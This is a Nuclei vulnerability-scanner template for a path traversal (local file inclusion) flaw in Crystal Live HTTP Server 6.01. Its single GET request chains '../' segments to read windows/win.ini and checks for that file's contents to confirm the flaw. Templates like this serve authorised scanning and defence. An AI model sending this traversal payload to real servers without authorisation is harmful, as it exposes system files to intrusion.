id: crystal-live-server-lfi

info:
  name: Crystal Live HTTP Server 6.01 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: Crystal Live HTTP Server 6.01 is vulnerable to local file inclusion.
  reference: https://cxsecurity.com/issue/WLB-2019110127
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: lfi,crystal

http:
  - method: GET
    path:
      - "{{BaseURL}}/../../../../../../../../../../../../windows/win.ini"

    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and

# digest: 4a0a004730450220285132346bb2db8c15d789bb5c368ba6e76b672fbc97bcd99be8d5656294596b0221008798724466e19a4e657bcdac59f43bf34386e4dbc157dea399267d3a75d80838:922c64590222798bb761d5b6d8e72950
